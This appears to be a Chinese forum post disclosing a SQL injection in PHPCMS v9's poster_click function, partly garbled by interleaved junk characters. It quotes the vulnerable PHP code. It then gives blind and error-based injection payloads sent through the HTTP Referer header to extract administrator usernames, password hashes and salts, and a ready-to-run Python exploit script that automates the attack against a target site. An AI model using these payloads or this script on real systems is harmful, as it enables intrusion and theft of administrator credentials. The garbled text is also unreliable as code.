I G4 Q/ ~) E/ q* C. Zpublic function poster_click() {- U: r5 J4 c, u' _
$id = isset($_GET['id']) ? intval($_GET['id']) : 0; 4 T! r. X2 q) d, X, n" j$r = $this->db->get_one(array('id'=>$id)); 0 a9 |4 b6 {7 Y. L# Eif (!is_array($r) && empty($r)) return false;# g& ]* f1 o2 n( h6 R6 w2 |
$ip_area = pc_base::load_sys_class('ip_area');& ?8 F T" { U6 j* l
$ip = ip(); + b% P7 `6 v! S7 c t. T" D$area = $ip_area->get($ip); $ i/ F% Y- R4 f& A7 s% ?6 s9 \$username = param::get_cookie('username') ? param::get_cookie('username') : ''; 0 T: b! _0 ]. G; p# Iif($id) {) w4 }6 `) J- q3 y1 T& n
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid(); / E7 y' g; N- ]* v6 w$ ^$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));# ?+ Q7 _* c7 w: h5 {. L
} + v/ Y9 n2 D2 |/ S" m) l. q9 l# `$this->db->update(array('clicks'=>'+=1'), array('id'=>$id)); ! b1 n9 f$ E; f6 W* `" e1 n$setting = string2array($r['setting']);5 d+ r- e* b h# E% P! x
if (count($setting)==1) {# h4 e5 U. G1 u/ R [& b( c$ I3 f# q
$url = $setting['1']['linkurl'];' u Q7 j. l" `0 w7 q/ }6 R
} else {6 G0 }/ V! v" @5 N- |! c
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl']; , x% d7 U2 T0 n) s2 r5 d}: c: S) X2 z) \2 Y. v/ H% m
header('Location: '.$url); 4 q6 U5 B: s% g, n$ c} 0 ^4 f% E8 P+ F8 M& \: M 3 A3 W: e+ `' A0 s" F" @2 } , ?1 I& y! Y0 Q8 k 8 Q% k- h; ^. [利用方式: 3 i1 T3 c% `& m- m; U. O2 V0 K( [; q' s" K( {: I
1、可以采用盲注入的手法: - c1 |! r' F9 H1 Z! I # {0 [5 V1 m* ?# W' l. }referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#' F- B$ a/ X2 g0 p
( C; v [7 t. e通过返回页面,正常与否一个个猜解密码字段。 , q R4 ?9 g- \/ v/ Z. K' \: a0 Y8 O, a/ |% }
2、代码是花开写的,随手附上了: + A! ~6 `# X# J0 G* M* u# M$ H i3 v7 w' T. a7 V1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)# ]9 g2 U2 ?1 M. I" {0 {6 a
% H) L% a) B5 M6 H, h! ?
此方法是爆错注入手法,原理自查。" B1 d6 J$ i0 \! s4 Y
# V ]5 q& w( [% Y) g/ S
7 U$ z) ]; {* i' W/ J
. `- i4 a" C/ R" q$ h0 b利用程序:: w! c" F3 }/ S1 H
' t/ v$ f( G" D0 _0 ?
#!/usr/bin/env python5 i" @. y) N/ D6 l
import httplib,sys,re }) o0 o7 N2 h6 q/ q) s/ |$ m- k" G( ]
def attack(): # R' |1 ?! b* _4 cprint “Code by Pax.Mac Team conqu3r!” 2 ?) |: `! @9 Tprint “Welcome to our zone!!!”1 E- r2 h- N4 C- l3 m
url=sys.argv[1] 5 ?) Z/ E+ v: h Opaths=sys.argv[2] + @1 x' P# r( G- ^8 Zconn = httplib.HTTPConnection(url); }5 T! F1 _, ]1 ]4 w: B
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″, 9 X. z0 C# A4 a! h, p9 a“Accept”: “text/plain”, + W: s* B V; G“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”} ' d0 C( U! c1 S6 K& V, ^conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers) : d" A5 V( q$ k7 y$ `8 f, Vr1 = conn.getresponse()# @5 l9 m, d, X5 b0 K
datas=r1.read() 2 E* `' @ V! ^1 ~7 `$ e. Ddatas=re.findall(r”Duplicate entry \’\w+’”, datas) ' L9 B/ z$ w% D/ }# Z9 F( u7 \print datas[0] " u5 O6 E% D/ C; Y% f- z8 ]: ^1 Qconn.close()# V( s1 `' C B' N; }
if __name__==”__main__”:3 r5 n! a3 V9 U& \1 j) i H
if len(sys.argv)<3:) Z- R( _% X6 Y% Z3 W" k7 H6 G1 E
print “Code by Pax.Mac Team conqu3r” 2 T6 \6 w$ `+ Q' Y0 Q2 K# F0 Dprint “Usgae:” * ^8 O: D6 `. ]: ^- A( Nprint “ phpcmsattack.py www.paxmac.org /” , f, }( U6 _% b0 N4 y3 Y" Dprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”6 K% s. u4 d1 n! A* A4 d
sys.exit(1) 6 T9 Q" a7 q0 Gattack()( Q( |/ E+ l8 l$ S7 u# z; f